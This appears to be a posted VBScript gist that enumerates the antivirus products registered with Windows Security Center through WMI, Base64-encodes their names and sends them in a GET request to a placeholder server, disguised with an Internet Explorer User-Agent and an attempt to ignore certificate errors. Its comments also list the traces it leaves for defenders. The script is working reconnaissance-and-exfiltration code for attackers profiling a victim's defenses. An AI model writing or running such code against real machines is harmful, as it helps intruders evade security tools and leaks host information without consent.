Last active
June 6, 2023 08:45
Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
Function Base64Encode(sText)
    ' Returns the Base64 text for the value passed in sText.
    ' The conversion is delegated to MSXML: a scratch element is typed as
    ' "bin.base64", the value is assigned as its typed content, and the
    ' element's text is read back as the encoded string.
    ' The only caller in this script passes the result of
    ' ASCIIEncoding.GetBytes_4, i.e. a byte array.
    Dim xmlDoc, scratchNode
    Set xmlDoc = CreateObject("Microsoft.XMLDOM")
    Set scratchNode = xmlDoc.createElement("tmp")
    With scratchNode
        .DataType = "bin.base64"
        .NodeTypedValue = sText
        Base64Encode = .Text
    End With
End Function
' Script body: lists the antivirus products registered with Windows Security
' Center and sends their display names, Base64-encoded, to a remote web server
' in the "id" query parameter of a single synchronous GET request.
'
' What this leaves behind for a defender, as far as the code below shows:
'   - a WMI query against ROOT\SecurityCenter2 (class AntiVirusProduct) issued
'     by whatever process hosts this script;
'   - an outbound HTTPS request made through MSXML2.ServerXMLHTTP that carries
'     an Internet Explorer 11 User-Agent string although no browser is involved;
'   - the product list itself in the request URL, so it is recorded wherever
'     URLs are logged (proxy, TLS-inspecting gateway, the receiving server).
Dim info, id
Dim secCenter, avProducts, avProduct, asciiEnc, httpReq

Set secCenter = GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set avProducts = secCenter.ExecQuery("Select * from AntiVirusProduct")

' Join every product's displayName, each followed by a "|" separator.
info = ""
For Each avProduct In avProducts
    info = info & avProduct.displayName & "|"
Next

' Convert the joined string to ASCII bytes, then to Base64 text.
Set asciiEnc = CreateObject("System.Text.ASCIIEncoding")
id = Base64Encode(asciiEnc.GetBytes_4(info))

' "HOSTNAME" is the placeholder used by the original author.
Set httpReq = CreateObject("MSXML2.ServerXMLHTTP")
httpReq.Open "GET", "https://HOSTNAME/?id=" & id, False

' Option 2 is SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS.
' NOTE(review): SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS is not declared
' anywhere in the visible script. With no Option Explicit, VBScript evaluates
' an undeclared name as Empty (0 in arithmetic), so this line writes option 2
' back unchanged and certificate checking stays at the object's default.
httpReq.setOption 2, httpReq.getOption(2) - SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS

httpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
httpReq.Send